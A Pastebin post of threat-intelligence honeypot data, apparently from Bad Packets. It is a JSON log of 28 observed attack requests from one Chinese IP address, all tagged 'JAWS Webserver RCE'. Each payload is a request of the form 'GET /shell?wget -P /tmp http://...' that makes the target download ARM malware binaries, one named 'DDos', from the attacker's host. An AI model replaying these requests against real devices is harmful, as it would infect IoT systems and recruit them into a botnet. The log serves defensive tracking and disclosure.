Advertisement
internetweather

Bad Packets CTI – payload containing C2 121.42.181.207

Feb 4th, 2020
735
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JSON 16.20 KB | None | 0 0
  1. {
  2.   "count": 28,
  3.   "next": null,
  4.   "previous": null,
  5.   "results": [
  6.     {
  7.       "source_ip_address": "121.42.181.207",
  8.       "country": "CN",
  9.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  10.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  11.       "post_data": "",
  12.       "target_port": 84,
  13.       "protocol": "tcp",
  14.       "tags": [
  15.         {
  16.           "cve": "",
  17.           "category": "IoT",
  18.           "description": "JAWS Webserver RCE"
  19.         }
  20.       ],
  21.       "event_count": 2,
  22.       "first_seen": "2020-02-04T04:27:37Z",
  23.       "last_seen": "2020-02-04T04:27:37Z"
  24.     },
  25.     {
  26.       "source_ip_address": "121.42.181.207",
  27.       "country": "CN",
  28.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  29.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  30.       "post_data": "",
  31.       "target_port": 5984,
  32.       "protocol": "tcp",
  33.       "tags": [
  34.         {
  35.           "cve": "",
  36.           "category": "IoT",
  37.           "description": "JAWS Webserver RCE"
  38.         }
  39.       ],
  40.       "event_count": 2,
  41.       "first_seen": "2020-02-04T04:24:06Z",
  42.       "last_seen": "2020-02-04T04:24:06Z"
  43.     },
  44.     {
  45.       "source_ip_address": "121.42.181.207",
  46.       "country": "CN",
  47.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  48.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  49.       "post_data": "",
  50.       "target_port": 3389,
  51.       "protocol": "tcp",
  52.       "tags": [
  53.         {
  54.           "cve": "",
  55.           "category": "IoT",
  56.           "description": "JAWS Webserver RCE"
  57.         }
  58.       ],
  59.       "event_count": 2,
  60.       "first_seen": "2020-02-04T04:21:48Z",
  61.       "last_seen": "2020-02-04T04:21:48Z"
  62.     },
  63.     {
  64.       "source_ip_address": "121.42.181.207",
  65.       "country": "CN",
  66.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  67.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM4LinuxTF HTTP/1.1",
  68.       "post_data": "",
  69.       "target_port": 84,
  70.       "protocol": "tcp",
  71.       "tags": [
  72.         {
  73.           "cve": "",
  74.           "category": "IoT",
  75.           "description": "JAWS Webserver RCE"
  76.         }
  77.       ],
  78.       "event_count": 3,
  79.       "first_seen": "2020-02-04T04:16:21Z",
  80.       "last_seen": "2020-02-04T04:16:21Z"
  81.     },
  82.     {
  83.       "source_ip_address": "121.42.181.207",
  84.       "country": "CN",
  85.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  86.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  87.       "post_data": "",
  88.       "target_port": 2375,
  89.       "protocol": "tcp",
  90.       "tags": [
  91.         {
  92.           "cve": "",
  93.           "category": "IoT",
  94.           "description": "JAWS Webserver RCE"
  95.         }
  96.       ],
  97.       "event_count": 1,
  98.       "first_seen": "2020-02-04T04:16:08Z",
  99.       "last_seen": "2020-02-04T04:16:08Z"
  100.     },
  101.     {
  102.       "source_ip_address": "121.42.181.207",
  103.       "country": "CN",
  104.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  105.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  106.       "post_data": "",
  107.       "target_port": 8291,
  108.       "protocol": "tcp",
  109.       "tags": [
  110.         {
  111.           "cve": "",
  112.           "category": "IoT",
  113.           "description": "JAWS Webserver RCE"
  114.         }
  115.       ],
  116.       "event_count": 1,
  117.       "first_seen": "2020-02-04T04:15:35Z",
  118.       "last_seen": "2020-02-04T04:15:35Z"
  119.     },
  120.     {
  121.       "source_ip_address": "121.42.181.207",
  122.       "country": "CN",
  123.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  124.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  125.       "post_data": "",
  126.       "target_port": 88,
  127.       "protocol": "tcp",
  128.       "tags": [
  129.         {
  130.           "cve": "",
  131.           "category": "IoT",
  132.           "description": "JAWS Webserver RCE"
  133.         }
  134.       ],
  135.       "event_count": 1,
  136.       "first_seen": "2020-02-04T04:13:09Z",
  137.       "last_seen": "2020-02-04T04:13:09Z"
  138.     },
  139.     {
  140.       "source_ip_address": "121.42.181.207",
  141.       "country": "CN",
  142.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  143.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM4LinuxTF HTTP/1.1",
  144.       "post_data": "",
  145.       "target_port": 5984,
  146.       "protocol": "tcp",
  147.       "tags": [
  148.         {
  149.           "cve": "",
  150.           "category": "IoT",
  151.           "description": "JAWS Webserver RCE"
  152.         }
  153.       ],
  154.       "event_count": 3,
  155.       "first_seen": "2020-02-04T04:12:58Z",
  156.       "last_seen": "2020-02-04T04:12:58Z"
  157.     },
  158.     {
  159.       "source_ip_address": "121.42.181.207",
  160.       "country": "CN",
  161.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  162.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  163.       "post_data": "",
  164.       "target_port": 443,
  165.       "protocol": "tcp",
  166.       "tags": [
  167.         {
  168.           "cve": "",
  169.           "category": "IoT",
  170.           "description": "JAWS Webserver RCE"
  171.         }
  172.       ],
  173.       "event_count": 1,
  174.       "first_seen": "2020-02-04T04:11:41Z",
  175.       "last_seen": "2020-02-04T04:11:41Z"
  176.     },
  177.     {
  178.       "source_ip_address": "121.42.181.207",
  179.       "country": "CN",
  180.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  181.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM4LinuxTF HTTP/1.1",
  182.       "post_data": "",
  183.       "target_port": 3389,
  184.       "protocol": "tcp",
  185.       "tags": [
  186.         {
  187.           "cve": "",
  188.           "category": "IoT",
  189.           "description": "JAWS Webserver RCE"
  190.         }
  191.       ],
  192.       "event_count": 3,
  193.       "first_seen": "2020-02-04T04:10:42Z",
  194.       "last_seen": "2020-02-04T04:10:42Z"
  195.     },
  196.     {
  197.       "source_ip_address": "121.42.181.207",
  198.       "country": "CN",
  199.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  200.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  201.       "post_data": "",
  202.       "target_port": 8181,
  203.       "protocol": "tcp",
  204.       "tags": [
  205.         {
  206.           "cve": "",
  207.           "category": "IoT",
  208.           "description": "JAWS Webserver RCE"
  209.         }
  210.       ],
  211.       "event_count": 1,
  212.       "first_seen": "2020-02-04T04:09:23Z",
  213.       "last_seen": "2020-02-04T04:09:23Z"
  214.     },
  215.     {
  216.       "source_ip_address": "121.42.181.207",
  217.       "country": "CN",
  218.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  219.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  220.       "post_data": "",
  221.       "target_port": 9001,
  222.       "protocol": "tcp",
  223.       "tags": [
  224.         {
  225.           "cve": "",
  226.           "category": "IoT",
  227.           "description": "JAWS Webserver RCE"
  228.         }
  229.       ],
  230.       "event_count": 1,
  231.       "first_seen": "2020-02-04T04:08:53Z",
  232.       "last_seen": "2020-02-04T04:08:53Z"
  233.     },
  234.     {
  235.       "source_ip_address": "121.42.181.207",
  236.       "country": "CN",
  237.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  238.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM6LinuxTF HTTP/1.1",
  239.       "post_data": "",
  240.       "target_port": 2087,
  241.       "protocol": "tcp",
  242.       "tags": [
  243.         {
  244.           "cve": "",
  245.           "category": "IoT",
  246.           "description": "JAWS Webserver RCE"
  247.         }
  248.       ],
  249.       "event_count": 1,
  250.       "first_seen": "2020-02-04T04:06:58Z",
  251.       "last_seen": "2020-02-04T04:06:58Z"
  252.     },
  253.     {
  254.       "source_ip_address": "121.42.181.207",
  255.       "country": "CN",
  256.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  257.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM4LinuxTF HTTP/1.1",
  258.       "post_data": "",
  259.       "target_port": 2375,
  260.       "protocol": "tcp",
  261.       "tags": [
  262.         {
  263.           "cve": "",
  264.           "category": "IoT",
  265.           "description": "JAWS Webserver RCE"
  266.         }
  267.       ],
  268.       "event_count": 1,
  269.       "first_seen": "2020-02-04T04:04:50Z",
  270.       "last_seen": "2020-02-04T04:04:50Z"
  271.     },
  272.     {
  273.       "source_ip_address": "121.42.181.207",
  274.       "country": "CN",
  275.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  276.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM4LinuxTF HTTP/1.1",
  277.       "post_data": "",
  278.       "target_port": 8291,
  279.       "protocol": "tcp",
  280.       "tags": [
  281.         {
  282.           "cve": "",
  283.           "category": "IoT",
  284.           "description": "JAWS Webserver RCE"
  285.         }
  286.       ],
  287.       "event_count": 1,
  288.       "first_seen": "2020-02-04T04:04:19Z",
  289.       "last_seen": "2020-02-04T04:04:19Z"
  290.     },
  291.     {
  292.       "source_ip_address": "121.42.181.207",
  293.       "country": "CN",
  294.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  295.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM4LinuxTF HTTP/1.1",
  296.       "post_data": "",
  297.       "target_port": 88,
  298.       "protocol": "tcp",
  299.       "tags": [
  300.         {
  301.           "cve": "",
  302.           "category": "IoT",
  303.           "description": "JAWS Webserver RCE"
  304.         }
  305.       ],
  306.       "event_count": 1,
  307.       "first_seen": "2020-02-04T04:01:58Z",
  308.       "last_seen": "2020-02-04T04:01:58Z"
  309.     },
  310.     {
  311.       "source_ip_address": "121.42.181.207",
  312.       "country": "CN",
  313.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  314.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/ARM4LinuxTF HTTP/1.1",
  315.       "post_data": "",
  316.       "target_port": 443,
  317.       "protocol": "tcp",
  318.       "tags": [
  319.         {
  320.           "cve": "",
  321.           "category": "IoT",
  322.           "description": "JAWS Webserver RCE"
  323.         }
  324.       ],
  325.       "event_count": 1,
  326.       "first_seen": "2020-02-04T04:00:34Z",
  327.       "last_seen": "2020-02-04T04:00:34Z"
  328.     },
  329.     {
  330.       "source_ip_address": "121.42.181.207",
  331.       "country": "CN",
  332.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  333.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  334.       "post_data": "",
  335.       "target_port": 84,
  336.       "protocol": "tcp",
  337.       "tags": [
  338.         {
  339.           "cve": "",
  340.           "category": "IoT",
  341.           "description": "JAWS Webserver RCE"
  342.         }
  343.       ],
  344.       "event_count": 17,
  345.       "first_seen": "2020-01-29T09:11:30Z",
  346.       "last_seen": "2020-02-03T07:39:03Z"
  347.     },
  348.     {
  349.       "source_ip_address": "121.42.181.207",
  350.       "country": "CN",
  351.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  352.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  353.       "post_data": "",
  354.       "target_port": 5984,
  355.       "protocol": "tcp",
  356.       "tags": [
  357.         {
  358.           "cve": "",
  359.           "category": "IoT",
  360.           "description": "JAWS Webserver RCE"
  361.         }
  362.       ],
  363.       "event_count": 9,
  364.       "first_seen": "2020-02-01T03:53:56Z",
  365.       "last_seen": "2020-02-03T07:33:43Z"
  366.     },
  367.     {
  368.       "source_ip_address": "121.42.181.207",
  369.       "country": "CN",
  370.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  371.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  372.       "post_data": "",
  373.       "target_port": 3389,
  374.       "protocol": "tcp",
  375.       "tags": [
  376.         {
  377.           "cve": "",
  378.           "category": "IoT",
  379.           "description": "JAWS Webserver RCE"
  380.         }
  381.       ],
  382.       "event_count": 17,
  383.       "first_seen": "2020-01-29T09:06:36Z",
  384.       "last_seen": "2020-02-03T07:29:55Z"
  385.     },
  386.     {
  387.       "source_ip_address": "121.42.181.207",
  388.       "country": "CN",
  389.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  390.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  391.       "post_data": "",
  392.       "target_port": 2375,
  393.       "protocol": "tcp",
  394.       "tags": [
  395.         {
  396.           "cve": "",
  397.           "category": "IoT",
  398.           "description": "JAWS Webserver RCE"
  399.         }
  400.       ],
  401.       "event_count": 24,
  402.       "first_seen": "2020-01-29T09:00:09Z",
  403.       "last_seen": "2020-02-03T07:27:59Z"
  404.     },
  405.     {
  406.       "source_ip_address": "121.42.181.207",
  407.       "country": "CN",
  408.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  409.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  410.       "post_data": "",
  411.       "target_port": 8291,
  412.       "protocol": "tcp",
  413.       "tags": [
  414.         {
  415.           "cve": "",
  416.           "category": "IoT",
  417.           "description": "JAWS Webserver RCE"
  418.         }
  419.       ],
  420.       "event_count": 24,
  421.       "first_seen": "2020-01-29T08:59:40Z",
  422.       "last_seen": "2020-02-03T07:27:11Z"
  423.     },
  424.     {
  425.       "source_ip_address": "121.42.181.207",
  426.       "country": "CN",
  427.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  428.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  429.       "post_data": "",
  430.       "target_port": 88,
  431.       "protocol": "tcp",
  432.       "tags": [
  433.         {
  434.           "cve": "",
  435.           "category": "IoT",
  436.           "description": "JAWS Webserver RCE"
  437.         }
  438.       ],
  439.       "event_count": 24,
  440.       "first_seen": "2020-01-29T08:57:32Z",
  441.       "last_seen": "2020-02-03T07:23:29Z"
  442.     },
  443.     {
  444.       "source_ip_address": "121.42.181.207",
  445.       "country": "CN",
  446.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  447.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  448.       "post_data": "",
  449.       "target_port": 443,
  450.       "protocol": "tcp",
  451.       "tags": [
  452.         {
  453.           "cve": "",
  454.           "category": "IoT",
  455.           "description": "JAWS Webserver RCE"
  456.         }
  457.       ],
  458.       "event_count": 24,
  459.       "first_seen": "2020-01-29T08:56:18Z",
  460.       "last_seen": "2020-02-03T07:21:14Z"
  461.     },
  462.     {
  463.       "source_ip_address": "121.42.181.207",
  464.       "country": "CN",
  465.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  466.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  467.       "post_data": "",
  468.       "target_port": 8181,
  469.       "protocol": "tcp",
  470.       "tags": [
  471.         {
  472.           "cve": "",
  473.           "category": "IoT",
  474.           "description": "JAWS Webserver RCE"
  475.         }
  476.       ],
  477.       "event_count": 24,
  478.       "first_seen": "2020-01-29T08:54:24Z",
  479.       "last_seen": "2020-02-03T07:17:26Z"
  480.     },
  481.     {
  482.       "source_ip_address": "121.42.181.207",
  483.       "country": "CN",
  484.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  485.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  486.       "post_data": "",
  487.       "target_port": 9001,
  488.       "protocol": "tcp",
  489.       "tags": [
  490.         {
  491.           "cve": "",
  492.           "category": "IoT",
  493.           "description": "JAWS Webserver RCE"
  494.         }
  495.       ],
  496.       "event_count": 24,
  497.       "first_seen": "2020-01-29T08:54:03Z",
  498.       "last_seen": "2020-02-03T07:16:37Z"
  499.     },
  500.     {
  501.       "source_ip_address": "121.42.181.207",
  502.       "country": "CN",
  503.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  504.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/linux-arm HTTP/1.1",
  505.       "post_data": "",
  506.       "target_port": 2087,
  507.       "protocol": "tcp",
  508.       "tags": [
  509.         {
  510.           "cve": "",
  511.           "category": "IoT",
  512.           "description": "JAWS Webserver RCE"
  513.         }
  514.       ],
  515.       "event_count": 25,
  516.       "first_seen": "2020-01-29T08:52:48Z",
  517.       "last_seen": "2020-02-03T07:13:45Z"
  518.     },
  519.     {
  520.       "source_ip_address": "121.42.181.207",
  521.       "country": "CN",
  522.       "user_agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)",
  523.       "payload": "GET /shell?wget -P /tmp http://121.42.181.207:663/DDos HTTP/1.1",
  524.       "post_data": "",
  525.       "target_port": 2087,
  526.       "protocol": "tcp",
  527.       "tags": [
  528.         {
  529.           "cve": "",
  530.           "category": "IoT",
  531.           "description": "JAWS Webserver RCE"
  532.         }
  533.       ],
  534.       "event_count": 8,
  535.       "first_seen": "2020-02-03T07:11:09Z",
  536.       "last_seen": "2020-02-03T07:11:09Z"
  537.     }
  538.   ]
  539. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement